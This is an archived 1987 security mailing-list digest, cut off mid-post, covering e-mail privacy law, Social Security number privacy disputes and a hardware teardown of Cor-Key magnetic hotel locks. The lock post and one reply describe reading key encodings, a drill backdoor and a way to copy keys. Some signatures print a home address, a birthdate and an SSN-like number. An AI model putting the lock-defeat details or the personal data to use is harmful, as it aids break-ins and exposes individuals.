Courier, and the U.S. Mail. There was a considerable fight some years back, I believe the 60's, where U.S. Mail Package Service was upgraded in Protection to U.P.S.. Does anyone have the exact definition of mail as used in this law ? or what it takes for a system to qualify ? Must the company file for licenses to be covered under such a law ? This is extremely vague but applaud MIT's Tech Talk, (is there any other ?), for their normative editorial position toward electronic messaging and conferencing privacy. Dave From: 20-May-1987 15:55:47 To: SECURITY@RED.RUTGERS.EDU Subj: [702] MAIL Privacy Discussion > [Isn't there a more appropriate mailing list where such things are discussed > continually and at length? If not, then go for it... _H*] Yes. On BITNET, it's known as MAIL-L, and is available from a number of LISTSERVers. I receive mine from LISTSERV@BITNIC. Hugh Pritchard PRITCHAR@CUA.BITNET Systems Programming The Catholic University of America Computer Center (202) 635-5373 Washington, DC 20064 Disclaimer: My views aren't necessarily those of the Pope. From: Bob Dixon 20-May-1987 12:17:53 To: SECURITY@RED.RUTGERS.EDU Subj: [1444] Impractical Legislation Another aspect of the recent privacy legislation concerns radio receivers. For the first time in US history, it is now illegal to tune a radio receiver to certain frequencies and listen to whatever may be transmitted there. This refers specifically to the cellular radio frequencies in the 800 mHz range, which are used for mobile telephones. The vendors of these systems have been telling their customers they are just as private as wire connections, but this has never been true. But since it improves sales to make the claim, they still do, and now there is legislation that tries to make it be true by fiat. Any UHF TV receiver and many commonly-available scanner receivers can tune to these frequencies, so it seems futile to say in essence "don't touch that dial" to someone who might happen to tune across those particular frequencies. The FCC has already said they have no intention of enforcing this legislation. The vendors could always encode their signals, but they do not want to as that would raise costs and decrease profits. I heard that some legislative body once decreed that pi = 3 exactly, because it made calculations easier. Bob Dixon Ohio State University From: 20-May-1987 12:55:49 To: security@uga Subj: [1599] Re: Electronic mail privacy > From: Richard Cheshire > Great! There's legislation to stop it! Harrah! After all, look at how much > drug legislation there is, and how it has decreased drug trafficing. There > are more and more laws regulating automobiles, so there will be fewer > accidents. That legislation also treats head on the "Human Nature" issues. > How? Just by making things illegal. Agreed! Just as it seems to be with your other examples, I think it is up to inidivdual security people and system administrators how seriously they take mail privcay and enforcement of the rules. It seems to me that anyone who values mail privacy should work to insure it and punish those who do the breaking, and that those who make the choice not to care as much should not mind so much when their mail system gets taken apart. Yes, this would be a step backward (a giant leap?) in standardization of legislation, and I realize it would be impractical to leave these decisions to each individual system's policies. But, is this kind of standardization necessary? While I'm thinking (it is indeed rare), what does this do to plans I have aheard about from the phone company to charge more for lines which are used with a modem? If it is my residential line, they would have to have some kind of line-monitoring. If I am doing e-mail, is their line monitoring illegal? Is it legal when I'm not? Chris Petersen Disclaimer: Who cares what I say anyway? From: Henry Mensch 20-May-1987 14:28:06 To: Subj: [339] Re: Electronic mail privacy >> [Isn't there a more appropriate mailing list where such things are discussed >> continually and at length? If not, then go for it... _H*] This has already been beaten to death in the RISKS digest, I think. -- Henry From: Jack Ostroff 21-May-1987 11:23:54 To: security@RED.RUTGERS.EDU Subj: [1044] more on traffic light sensors From my experience of having driven ambulances and a fire truck (both as a volunteer, not a professional) changing all four directions to red might decrease problems with traffic light phreaks, but green really helps. Even emergency vehicles with lights and sirens on are supposed to stop before proceeding through a red light. (I know it doesn't always happen that way, but if an emergency driver doesn't stop at red light, any accident is considered his fault.) The second problem is with having the lights respond to the siren. Most emergency vehicles use electronic sirens - which can produce several kinds of sounds (wail, yelp, hi-lo) and drivers frequently keep switching between them to try to get the attention of oblivious drivers of nearly sound-proof cars. Such sensors would have to respond to all modes of all makes of sirens used in that area. Jack (OSTROFF@RED.RUTGERS.EDU) From: davy@intrepid.ecn.purdue.edu (Dave Curry) 24-May-1987 20:25:01 To: risks@csl.sri.com, security@red.rutgers.edu Subj: [1433] Electronic Communications Privacy Act When I got the MIT notice from the SECURITY list, I did a little digging in the law books (Purdue's library is a Federal Depository). I pulled out a copy of the Act (Public Law 99-508, H.R. 4952) and a copy of Title 18 of the United States Code, which it amends. From this (after a couple of hours of "strike words a through f, insert words g through m" -- I'd hate to be a law clerk), I extracted most of the "interesting" parts of the law. These parts pertain to administrators and users of electronic communications services (if your machine has electronic mail or bboards, it fits into this category). The parts I specifically went for were what we can and cannot do, what the punishment is if we do it, and what our means of recourse are if it's done to us. I left out all the stuff about government agents being able to requisition things and stuff, and all the stuff pertaining to radio and satellite communications. So anyway, I typed all this stuff in to give it to our staff so they'd be aware of the new legislation. Since there is probably interest in this, I am making the document availble for anonymous ftp from the host intrepid.ecn.purdue.edu. Grab the file "pub/PrivacyAct.troff" if you have troff (it looks better), or "pub/PrivacyAct.output" if you need a pre-formatted copy. Bear in mind I'm not a lawyer, and I just typed in the parts of the law I deemed to be of interest to our staff. --Dave Curry From: Steinar Haug 27-May-1987 08:54:50 To: , Subj: [1049] Encryption, anyone? In connection with the implementation of secure MHS (X.400 based) systems, I'm looking for any available programs to perform DES and/or RSA encryption. Before you start telling me about it: Yes, I'm aware that there is a version of DES used in Unix systems to encrypt passwords. Yes, I'm aware of the MP multiple precision math package running under Unix. The trouble with both of these is that they are simply too slow! The Unix DES because (among other things) it was made slow on purpose; the mp package because it is a very general package using a lot of malloc/free calls. So I'm looking for something faster... Preferably written in C or Pascal, running on VMS or Unix systems. Any help is appreciated! Steinar Haug Database Research Group, Computing Center at the Univ. of Trondheim, Norway E-mail: haug%vax.runit.unit.uninett@nta-vax.arpa steinar@nta-vax.arpa From: *Hobbit* 29-May-1987 06:42:15 To: security@RED.RUTGERS.EDU Subj: [6668] Evaluation: Cor-Key Magnetic locks I recently had a chance to disassemble and examine yet another type of hotel security system. These are all-mechanical magnetic door locks made by Cor-Key Systems in California. The user is given a small white plastic card with rounded ends, and inserts same into a slot in the top of a rather large doorknob on his room. Pushing the card all the way into the slot "connects" the knob to the actual latch hardware and allows entry; otherwise the knob just spins around. The neat thing about these is that the latch and the rest of the lock are a standard lockset that could have been made by anybody, and to upgrade to the Cor-Key system one simply has to install this other doorknob. Thus the hotel, which previously had regular old key locksets, avoided a lot of expense and retrofitting. Internally, the lock works entirely by magnetism. The card is laminated plastic over a layer of rather granular magnetic material that can be magnetized in small regions and hold the field virtually forever. When the card is inserted into the slot it covers up a matrix of 35 or so holes, and the tumblers move according to how the north or south regions on the card line up with the matrix. The tumblers themselves are small cylindrical permanent magnets, and are attracted or repelled by the card regions. About nine of these are sprinkled around the matrix, leaving a lot of the holes empty. Each tumbler has a spot of either red or blue ink on one end to indicate its polarity. The parts are arranged as follows, moving toward the door along the axis of the shaft. Front doorknob surface, steel plate, card slot, thin nonmagnetic metal plate, brass plate with holes, plastic slider with wells containing the tumblers. Everything except the plastic slider is fixed in place; the slider is held in place by the tumblers, which normally are attracted partway out of their wells toward the steel plate and are thus protruding through the holes in the brass plate. Thus the slider can't slide, because the tumblers are locking it to the brass plate. The correct key imposes itself down between the steel plate and the tumblers, and if the regions on the key repel *all* the tumblers away from itself, all the tumblers retreat into the plastic housing out of the brass plate. Then the slider is free to move, which it does when the key is pushed down the last quarter-inch or so. This engages the latch mechanism and connects it to the knob, so the door will open when the knob is turned. There is a mechanism for rekeying a door quickly: near the bottom of the knob there are two small holes through which a small tool can be inserted. Under these are two rotating alloy carriers, each containing one tumbler. Each carrier can be rotated to one of four positions, giving a total of 16 combinations between them. Rotating one of these moves the respective tumbler to a different point in the matrix, thus disabling one key and allowing a new one to work. Guest keys would have variable encoding in these matrix regions, and the master key[s] would be configured such that they would address these tumblers regardless of where they were. Since this only creates 16 possible combinations between them, it is a "first level" of mastering which can be changed without disassembly. More in-depth mastering is done by leaving parts of the static matrix empty, but the tumblers that are installed will match the corresponding regions of the master keys. In an unmastered system, if the entire matrix were filled with tumblers, all the locks and keys would be configured the same and all keys would work everywhere. Each lock is made unique by removing different parts of the matrix, and each guest key is made unique by differently magnetizing the "don't care" regions that correspond to the empty parts of the matrix in the given door. Thus Guest A's key will correctly address the parts of the matrix that Room A's knob contains, but the *other* regions in his key will incorrectly address the filled matrix locations of Room B's lock. The master key essentially repels the entire matrix's worth of tumblers, whether it's there or not. It was mentioned that the master also has a hole in the appropriate place to bypass the double-locking mechanism -- normally when the door is double-locked, a small rod protrudes into the key slot and completely prevents insertion of a normal key. Each location in the matrix is numbered [not in any obvious way, but...] so that the combination can easily be represented by a computer. Although in the past when the company started, records of whose lock contained what were kept in large books, computers are now being used to keep track of this. The keys are magnetized at the desk with a machine containing an equivalent matrix full of electromagnets. These can generate, I'm told by the Cor-Key people, fields of 250 gauss or so. A key region can be made north, south, or neutral; it is possible to "read" a key's encoding by running a !small! magnet over it and feeling if it's attracted, repelled, or ignored. [One of the tumblers glued to a piece of flexible wire worked fine.] However, even examining the part of the matrix you were given only gives you a small section of the master key, so it's virtually impossible to generate a hotel master by examining your own lock. Pick this one? Forget it. The tumblers are inaccessible behind the thin nonmagnetic plate. Perhaps a very large strong electromagnet could fit over the entire knob, remagnetize *all* the tumblers one way [good luck!] and then apply a gentler field in the reverse direction to push them all inward. I really don't see something like this working either. An expensive and precise piece of equipment could concievably be built to stick a small coil down into the slot and "read" the matrix by applying fields in different directions while the user listens for each individual tumbler to bang against one end or the other. Yuk. Conceptually, therefore, the Cor-Key is fairly secure. Unfortunately the workmanship of the lock itself is a bit on the shoddy side, and I was told by the people who build them that the official "backdoor" used in cases where the lock is completely screwed up is to drill a hole in a magic spot and force the latch mechanism to engage. Furthermore, to *really* re-key the lock it must be taken completely apart, because any key encoded the same all over the two changeable regions will open the lock regardless of where the carriers are rotated to. _H* From: Michael Robinson 29-May-1987 13:55:21 To: SECURITY Digest Subj: [911] Privacy in Electronic Communication You'd have an awfully hard time proving a case of electronic espionage against someone if you failed to take any steps to protect your own interests. The burden of proof always rests with the prosecution. The easiest way to send sensitive information is to use the telephone or some other network which has made some sort of legal guarantee of privacy. And take some sort of action to protect your interests in the event of casual contact. For example, you can encrypt the message and attach a plaintext notice which clearly states that the contents of the message are confidential. Casual contact with the message will not damage your interests. No one who tampers with the message can honestly say that they didn't know that it was wrong. /mr/ From: 4-Jun-1987 22:30:31 To: security@red.rutgers.edu Subj: [557] Re: Evaluation: Cor-Key Magnetic locks Science marches forward: A piece of high-temperature superconductor would repel all the tumblers. A magnetic metal with a low (but above room temperature) Curie point could be heated to above the Curie point, inserted into the slot, and allowed to cool. It would then carry a "negative" field of the correct key. You'd have to reverse the polarity of each magnetized region. Gee, what fun. Matt Crawford From: Chris Miller 11-Jun-1987 11:52:12 To: security@RUTGERS.EDU Subj: [1115] References request : I am currently researching a PhD in computer security at Heriot-Watt University, Edinburgh,Scotland. My main topic is formal models and their representation as logical rules in an expert system or logic database. At this time I am still reviewing the literature in the field, and as such I would be extremely grateful for any information/reference list or conference proceedings that readers can recommend. Many thanks. ----------------------------------------------------------------------------- David J Ferbrache | | Heriot-watt university | JANET : davidf@uk.ac.hw.cs | Dept of Computer Science | UUCP : davidf@cs.hw.ac.uk | 79 Grassmarket | TELE : (UK) 31-225-6465 ext 553 | Edinburgh EH1 2HJ | | Scotland. | | From: kohl@anl-mcs.arpa (C-234) 24-Jun-1987 15:47:24 To: Security@RUTGERS.EDU Subj: [670] Security Auditing Program Greetings: I am looking for a copy of the source code (online) for a set of security auditing programs as described and listed in the book "UNIX SYSTEM SECURITY" by Wood and Kochan. Could you provide me with this software or point me to who could? I would rather not type in 20 pages of code if I could help it. Also if there are any other Unix security programs which might be of interest, please let me know. Thanks for your time, Jim Kohl Mathematics and Computer Science Division Argonne National Laboratory (kohl@anl-mcs.arpa) From: hao!gatech!spaf@ames.arpa (Gene Spafford) 21-Jul-1987 14:37:36 To: security@RUTGERS.EDU Subj: [5205] SS# & Utilities -- a story As a matter of principle, I'm one of those people who won't give out my social security number when applying for utilities or credit cards. The reasons why have been discussed numerous times in various security-related groups. It is my understanding that it is against the law to force someone to give his/her social security number unless it is a government agency; although I've often run into occasional resistance, a few moments of explanation has usually resulted in things working out okay. Then there's today. I'm moving to W. Lafayette Indiana in two weeks and I called to establish my phone service there. Indiana is served by GTE for phone service. I did not anticipate any problems since I have an excellent credit history, as could be verified by a quick check with the local Southern Bell folks. After the rep at GTE took all my information down, she asked for my SS#. I explained that I don't give that out. She informed me that I would be required to pay a $75 deposit if I refused to give my SS#. So, I asked to talk to her supervisor. Her supervisor repeated that I would have to give my SS# to waive the deposit. I asked if they could simply call Southern Bell or take a credit card #, or they could call Purdue and verify my employment. He said that wasn't enough -- I had to supply my SS#, no other option. I enquired as to why they needed it -- he said it was for a credit check and to verify future disconnect requests. I explained that they could do that self-same credit check without the SS# *and* I don't give out my SS# precisely because I don't want it used as a verification number on my account. He insisted I either supply the number or pay the deposit. He also asked why I was being so stubborn -- it was even on my driver's license, wasn't it? (It isn't -- and hasn't been. In Georgia, you have always had the option of having a different ID, and now the licenses are being issue with those as default. The guy at GTE claims that the Indiana licenses are *required* to have the SS# on them -- anyone know if this is true? It shouldn't be...) I explained that having done some work in computer security, and personal experience, I know how that number can be abused. He said I was the only person he'd ever run into to refuse to give the SS# (!). I then asked him if the requirement for a SS# was written policy -- I wanted a copy to examine. He informed me that such information was private to the company and I couldn't have a copy -- didn't I trust him? I then asked if that policy was on file with the state Public Service Commission. At that he (rather loudly) asked if I wanted service with GTE or not? I asked him very calmly if he was threatening to deny me service -- he quieted down. I next explained that I wanted to see a copy of the written policy because it would be interesting to include in an article I might write on improper use of SS#s. He became very quiet. I offered to find the name and number of someone at Southern Bell who could verify my 9 years of service here. He said to call back with that information (thankful to get rid of me, I guess). The lady I talked to at Southern Bell was very helpful. She informed me that all the Southern Bell operators are told not to force a SS# because it is against both policy and law, but if someone won't provide it they are to get a bank account # or credit card number (both of which I am willing to give in circumstances such as this). She was more than willing to talk to the supervisor at GTE and give him a credit reference, if only he'd call. She said she'd also fill him in on policy. *AND*, most interestingly, Southern Bell had somehow obtained my SS# through other means and it was on file, but she marked it so that it was not to be given out to anyone, specifically not anyone with GTE Indiana. :-) Back to GTE. I called the supervisor (collect, of course) and gave him the name and number of the lady at Southern Bell. He was very curt and said he'd probably still require a deposit. He hung up on me. 20 minutes later the original GTE operator called me back and cheerily informed me that my service would be turned on August 4 with *no* deposit required! Questions --------- 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too? 2) Anyone know if other people at GTE Indiana are such jerks, or is this an isolated instance? 3) Anyone know if Indiana does, in fact, *require* that the SS# be on the driver's license? 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort). Too bad we don't have a choice of phone companies as well as long distance carriers -- I'd keep Southern Bell. -- Gene Spafford Software Engineering Research Center (SERC), Georgia Tech, Atlanta GA 30332 Internet: spaf@gatech.gatech.edu uucp: ...!{decvax,hplabs,ihnp4,linus,rutgers,seismo}!gatech!spaf From: khayo@locus.ucla.edu 21-Jul-1987 16:08:09 To: security@RUTGERS.EDU Subj: [2289] Re: SS# & Utilities -- a story In article <16026@gatech.edu> spaf@gatech.UUCP (Gene Spafford) writes: As a matter of principle, I'm one of those people who won't give out my social security number when applying for utilities or credit cards. (...) 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too? When I came to the US I was sufficiently worried about getting a bank acct., insurance etc. that I didn't even think about this problem. Now I wish I had - not because of any abuse of my SS# (at least I'm not aware of it), but as a matter of principle. Now my # is all over the place, so there's no point withholding it; but I'm glad to see that there still are some Don Quixotes like you. This country is one of the very few remaining in which *privacy* still has some practical meaning, and where an average guy can influence the world (at least locally) by *doing* things [to the skeptical "realists" out there: this may sound like idealism, I realize that, but believe me - it's true!]. 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort). YES, you should! YES, it's worth the effort. As an aside, my fight with windmills consists largely of writing letters to various Co.'s from which I received a less-than-reasonable service. I was surprised that most of them (Sears, United Airlines, Ralphs stores etc.) take such letters seriously - at least someone high-up reads them & sends an individually written reply. In some cases I noticed that things that I complained about actually changed for the better just after I received an answer, but of course it may be a coincidence. But what surprised me even more is that so many people around me think I'm nuts to even bother, saying that it's a total waste of time. Oh, well, I'll just keep doing that until my Mac drops dead. (BTW, so far I got frustrated in only one case: USPS; 5 letters to the Postmaster without a reaction...) Eric From: duke!cds@mcnc.org (Craig D. Singer) 22-Jul-1987 15:09:15 To: security@RUTGERS.EDU Subj: [2059] Re: SS# & Utilities -- a story >As a matter of principle, I'm one of those people who won't give out my >social security number when applying for utilities or credit cards. >(...) > >1) Do many of you (net-readers) withhold your SS# in similar circumstances? >Do you have these kinds of confrontations too? When I came to the US I was sufficiently worried about getting a bank acct., insurance etc. that I didn't even think about this problem. Now I wish I had - not because of any abuse of my SS# (at least I'm not aware of it), but as a matter of principle. Now my # is all over the place, so there's no point withholding it; but I'm glad to see that there still are some Don Quixotes like you. I agree that Mr. Spafford showed great poise and determination in refusing to give out information against his will. But as Mr. Behr has pointed out, there's no point withholding it once everybody has it. And, considering that Southern Bell had Mr. Spafford's social security number in spite of the fact that he never gave it to them personally, it's clear to me that if someone wants your SS# bad enough, they'll get it whether you want them to or not. I'll agree that withholding it whenever possible at least reduces the probability that some Joe on the street will obtain it and misuse it; but there's a bit of paranoia in that attitude as well. If the options are to risk the information leakage and subsequent misuse, or to have stress- inducing episodes similar to Mr. Spafford's affair with the arrogant GTE employee, personally I'll take the information risk. Nevertheless, an interesting account of the narrowing interpretation of American privacy. -- Craig D. Singer ARPA: cds@cs.duke.edu Department of Computer Science UUCP: ...!decvax!duke!cds Duke University CSNET: cds@duke Durham, NC 27706-2591 USA Phone (919) 684-5110 ext. 20 From: poisson.usc.edu!mlinar@oberon.usc.edu (Mitch Mlinar) 23-Jul-1987 01:06:33 To: security@RUTGERS.EDU Subj: [814] Re: SS# & Utilities -- a story In article <16026@gatech.edu> spaf@gatech.UUCP (Gene Spafford) writes: >3) Anyone know if Indiana does, in fact, *require* that the SS# be >on the driver's license? I am not sure about Indiana, but I have lived in CA, WI, IL, and CO: NONE of them require SS#. In fact, WI and IL function off credit cards whereas CA and CO function of driver's license #. It is also a GOOD idea to check with the local SS office every two years and get a report of your account activity (you are legally entitled). If there has been anyone USING your SS# to "steal" the funds, you will know about it. (If you wait more than 7 years[?], whatever is missing is gone.) From: Paul Martin 24-Jul-1987 15:00:22 To: security@RUTGERS.EDU Subj: [4197] SSN again I too have resisted handing my SSN to every bozo who requests it, and have consistently met with great surprise that anyone should be so brazen as to hide such basic information. I got in the habit of refusing to supply it when I worked for business DP houses to support my undergradutate education. California asked me for it when I traded in my NC drivers license (1972), and also every time I've registered a car here since then. They always point out that I HAVE to supply it, so I write "Privacy Act" in the slot, they show it to their supervisor, and the matter ends there. It turns out that California uses the SSN to tie drivers licenses and vehicle registrations together, so that if a driver has any dealings with the law, any warrants for old parking tickets can be settled by putting him in jail until they are paid off. While this certainly has the effect of reducing the number of parking scofflaws on the roads, it has interesting implications for the SSN. I learned of the DMV practice in 1974 when I was stopped on suspicion of car theft while trying to push-start my girl-friend's car for her. The officer got friendly when the ownership was cleared up, but then pursued and pulled me when the radio dispatch told him I had an outstanding warrant for parking. Details of the warrant and the claim that it arose from a parking incident in a year that I was never in CA convinced me, and eventually the officer, that something was amiss. He let me "escape", and, per my promise, I called the sheriff to find out what was up. Seems that a fellow named "Paul __Allen__ Martin" had lived in Monterey, parked overtime in SanFran, and failed to pay the piper for this tune. So what? Well, seems he had ALSO refused to supply his SSN, so both he and I had "000-00-0000" entered in the DMV computer; the drooling idiots in DMV's DP department hadn't provided a value to indicate "not known" for that field! So, the officer calling my name in on the radio [Paul ___Alan___ Martin] would be informed of "my" warrants based on an "exact match" on the SSN. For the next three years, I had to point out the spelling of my middle name as a prelude to every dealing with DMV and law officers to avoid a trip to the cooler. The statute of limitations finally came to my rescue, but I have no idea whether I'm still on file as "bad guy who got away". I am a regular blood donor for both the Red Cross and the local med school hospital (Stanford U). I have done pheresis donations for specific patients; this is a process where 6 to 12 times as much blood as a normal donation is taken (a bit at a time) and separated to extract just the component needed by the patient. The components are always something like white cells which, especially in such high doses, must be carefully matched to the recipient's immune system. This matching process is the same one used for organ donor matching; because of the degree of match required, there are typically dozens instead of millions of potential donors known for a given pattern. To block all sorts of undesirable interactions (e.g., bribery, extortion, or even innocent but desperate pleading), a secure wall of anonymity is maintained between the donor and the recipient. Despite this, the Red Cross and Stanford Med Center each ask for the donor's SSN! When I refuse it (offering some alternative to disambiguate me from others with the same name), they ask me "Why?" I point out that if their files on HLA type (the immune system coding scheme) were ever stolen, I'd hate to have someone who was quite rich, quite sick, and quite ruthless discover that (1) I matched his HLA type, (2) My heart works a lot better than his (or else they wouldn't accept me as a pheresis donor), and (3) I've filed a universal organ donor card, making my spare parts available in the event that some hood should happen to blow my head off in the foyer of a hospital.... After hearing this explanation, most nurses say something along the lines of "I wonder if I can purge my OWN SSN from the database?" Cheers... Paul From: "Bryan, Jerry" 24-Jul-1987 17:13:26 To: Subj: [3575] SS# & Utilities -- a story As a matter of principle, I'm one of those people who won't give out my social security number when applying for utilities or credit cards. The reasons why have been discussed numerous times in various security- related groups. It is my understanding that it is against the law to force someone to give his/her social security number unless it is a government agency; although I've often run into occasional resistance, a few moments of explanation has usually resulted in things working out okay. I wish you were correct, but contrariwise, there seem to be no restrictions whatsoever about the use of social security numbers *outside* the government. All the restrictions seem to apply only to the government. The guy at GTE claims that the Indiana licenses are *required* to have the SS# on them -- anyone know if this is true? It shouldn't be...) Again, sorry to be a pessimist, but driver's licenses are one area where federal law specifically *permits* states to require SSN's. Of course, once it is a part of your driver's license, there is virtually no way *not* to give it out to the rest of the world. Also, I spent three years in Virginia not being able to vote because I would not give them my SSN. In the bitter end, the law was on their side via a grandfather clause. This is different from the driver's license case. A state can require SSN for voting only if they required it before some date ('74 maybe, or '79), but they can require it for driver's license, period. Also, *every* time the government asks for it, they are supposed to cite the law which authorizes it, but they never do. Unfortunately, if they violate federal law by failing to provide such notification, there is not penalty. Thus, there is no real force to the law. 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too? Yes, and yes, but I have just about given up. The people you deal with do not know what you are talking about, and have no authority anyway. Going to supervisors does not really improve things. I am convinced that effort at this level is totally wasted. About the only place where effort is worthwhile is with Congress. Until there is legislation without so many exceptions and with penalties for non-compliance, we are all wasting our time. 3) Anyone know if Indiana does, in fact, *require* that the SS# be on the driver's license? I believe the answer is yes, based on relatives who live there. 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? Possibly, but only for the treatment you received, not the SSN issue itself. As a point of interest, there are many cases that the applicability of the existing law (weak though it may be) is unclear. The existing law applies to "federal, state, and local government". For example, is a state university covered as "federal, state, or local government"? Is a phone company which is regulated by a State government? My experience is that a state university will claim to be a part of the state government when it is to their advantage and your disadvantage, and vice versa of course (as when state employees are given a pay raise and university employees are not or vice versa). From: Nick Papadakis 24-Jul-1987 17:42:32 To: security@RUTGERS.EDU Subj: [2144] SS# & Utilities -- a story As a matter of principle, I'm one of those people who won't give out my social security number when applying for utilities or credit cards. me too. 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too? sure do. 3) Anyone know if Indiana does, in fact, *require* that the SS# be on the driver's license? Couldn't say. Virginia has written a statute that requires it for Virginia licenses. 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort). Every time I have been asked for my ssn by someone who legitimately requires it (i.e. the federal government) there has been an accompanying blurb with a reference to the federal law that empowers them to ask for it. Evidently Virginia is attempting to emulate this strategy. Unfortunately, the ssn isn't exactly in their purview, and their reasons for "needing" it fall more under the heading of convenience than real need. I frankly don't see why people's privacy should be threatened in order to make things slightly easier for a few programmers. Virginia has a history of being a place where bad laws are made. An example is the illegality of radar detectors there. (as far as I know, only D.C. and Connecticut have similar laws.) I'd say, make it as expensive as you can for them to do business with you until they do business right. Monopolize as much phone time and letter writing-time as possible - it costs them about $30 to write you a form letter. Monopolies need to be kicked periodically. Use your rights or lose them. Too bad we don't have a choice of phone companies as well as long distance carriers -- I'd keep Southern Bell. Maybe you should find out how they got your ssn first ... -- Nick Papadakis nick@mc.lcs.mit.edu SSN: 213-09-2981 (right ...!):-) From: DPickett@his-phoenix-multics.arpa 25-Jul-1987 00:56:15 To: Security@RUTGERS.EDU Subj: [1944] Re: SS and the data theives... The privacy act of 19?? (consult your local ACLU chapter) forbids use of the SSN except for valid SS purposes like tax and employment and such, except for federal agencies covered under a grandfather clause and also state governments, but then only by statute (no bureaucratic initiatives without legislative approval). New Jersey had a bill bouncing around to rescind the bill that allowed them to force us to divulge it. My university tried to get it, but I made them give me another and then had a great time correcting and confusing them with my 4 digit "Social Security Number". The main reason for overuse of the SSN is simplemindedness. Numbers are a great resource. You can give them out. Until you give out a lot, they stay compact. Anyone can make up a numbering system. But they prefer to steal someone else's system, especially if you already know your number and it is unique. There is a natural tendency for the disadvantages of an old way to attach themselves to a new way. Ever see a computer operator cry because checks get ruined? You'd think it was money, not preprinted forms!!! So it is with numbers; instead of your name and address or whatever, they can organize their data better by arbitrary numbering. But they use non-arbitrary numbering, because they miss the point! So, the best reason to refuse them your SSN is that they are misusing the concept of numbering! Spread knowledge to the masses. Explain how numbering works best only if it is arbitrary and specialized. Explain how the SSN has so many digits that they could as easily look up your name! (9999 customers looked up in a table of SSN could take ten trillion digits of storage!) Point out that you are the only David Pickett at RR2, box 631, Thorofare, NJ 08086-9632, born 5/20/49. From: William Daul / McDonnell-Douglas / APD-ASD 27-Jul-1987 17:29:03 To: SECURITY@RUTGERS.EDU Subj: [481] Garage Door Openers (not your typical question) A friend of mine has a two car / two door garage. He wants to install a remote control garage door opener on both doors with different frequencies for each door. He would also like ONE controller that can switch between the frequencies. Is there such a off-the-shelf system? Thanks, --Bi// From: Larry Hunter 27-Jul-1987 12:05:37 To: security@RUTGERS.EDU Subj: [3317] Re: SS# & Utilities -- a story 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too? Yes! I had a similar confrontation with Southern New England Telephone. When I initially tried to acquire phone service in New Haven, I refused to give out my social security number. The customer service representative told me I would have to make a $200 deposit in lieu of giving out my SSN. I asked to talk to his supervisor. The supervisor gave me the same story. I told her that I was not going to give out my SSN and I was not going to pay anything extra as a result. I said further that if they intended to deny me service, they had better get in touch with their legal department and then call me back. The entire conversation was civil and friendly, but only because I kept it that way. I got a call back the next day telling me they would install my phone without a SSN or a deposit. Why does this work? Simple. The privacy act of 1974 restricts governmental use social security numbers. With certain (fairly significant) exceptions, a government agency cannot require your SSN unless it is related to social security or tax matters. Furthermore, if a gov't. agency asks for your SSN voluntarily, they must explain that it is voluntary and what it makes no difference if you give it or not. On the other hand, there is NO legislation restricting commercial uses of SSNs; if you don't give it to them, they don't have to do business with you. This is especially pernicious with credit and banking institutions. At any rate, the phone company falls in between: Since they are a state regulated monopoly, they probably don't have the ability to demand your SSN. They certainly don't want that tested in court, since they might loose the freedom to coerce and intimidate as they do. Phone companies lose huge amounts of money on unpaid final bills, and they like to be able to track people down -- SSNs are, of course, invaluable for this. You'll find other local monopolies (e.g. gas and electric companies) work pretty much the same way. With them, your SSN is yours alone. Probably the best reference on all of this stuff is Robert Ellis Smith's "Privacy: How to Protect What's Left of It", available for $7 (prepaid) from The Privacy Journal, P.O. Box 15300, Washington, DC 20003. The PJ itself is a great newsletter for keeping track of this kind of stuff, and they have a variety of other interesting publications for sale. 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort). Yes! It is definitely worth sending off a few letters. I'd send copies to the phone company's customer service department, the state public utilities commission, your state representatives, your congressmen, local newspapaers and to the Privacy Journal (address above). If nobody complains about this sort of thing, it will be institutionalized beyond change before we know it. Larry Hunter From: RMOREY%ATLAS%rca.com@relay.cs.net 28-Jul-1987 06:28:13 To: SECURITY-REQUEST@RUTGERS.EDU Subj: [715] SS# I don't understand how a Social Security number could be abused. In Massachusetts, your driver's licence number IS your social security number. Therefore, anytime you write a check to a store, they write your licence no. (SS#) and a charge card no. on the back of your check for approval. I can see how, in this state, it would be VERY easy for ANYONE to obtain your SS#. So, being rather naive, I'd like to know what to watch out for in giving out my SS#, and how someone could abuse my number. Thank you. Randy Morey GE Automated Systems Burlington, Mass RMOREY%ATLAS%RCA.COM@RELAY.CS.NET From: trainor@locus.ucla.edu 29-Jul-1987 22:09:51 To: security@RUTGERS.EDU Subj: [485] SS# other options There are also other options. I know several people who give out random numbers and have been doing so for quite some time. They are very clever about not declaring it to be the number on file with Social Security. This is done verbally--boxes on forms are left blank. There are two variations: 1) random numbers at every query, 2) random numbers for each institution. From: 30-Jul-1987 00:39:31 To: security@red.rutgers.edu Subj: [536] Some of the older readers of this list may remember my posting of an outline for an article about computer security for lawyers which I was working on last year. (Is that a single sentence? Am I pretending to be a writer?) Anyway, I just got the galleys back from the publisher. It's going to be3 in the September issue. If anybody wants a copy of it, ask me and I'll send a draft. If the demand is great, I'll make it ftp'able. -simson From: David Chase 31-Jul-1987 00:14:35 To: security@RUTGERS.EDU Subj: [433] re: SS# Suppose I demand that a company with a copy of my SS# but no right or need for it remove my SS# from their records. Is there any hope of this working, or will they just laugh at me? Are there any big legal sticks that I can wield? If it is that important to keep the number secret, then this OUGHT to work. David From: RMOREY%ATLAS%rca.com@relay.cs.net 31-Jul-1987 18:44:41 To: SECURITY-REQUEST@RUTGERS.EDU Subj: [1212] Dogs, defense against Being new to the net, I'm not sure if this topic has been discussed before. My apologies if it has. My wife loves to take my daughters (ages 2 and 2 months) for walks, but there are usually 1 or 2 big dogs loose that terrify them. We have a leash law in my town, and a friendly dogcatcher. Calls to the dogcatcher do nothing. His office is only open from 3pm to 4pm. Also, dogs will come into our backyard where my 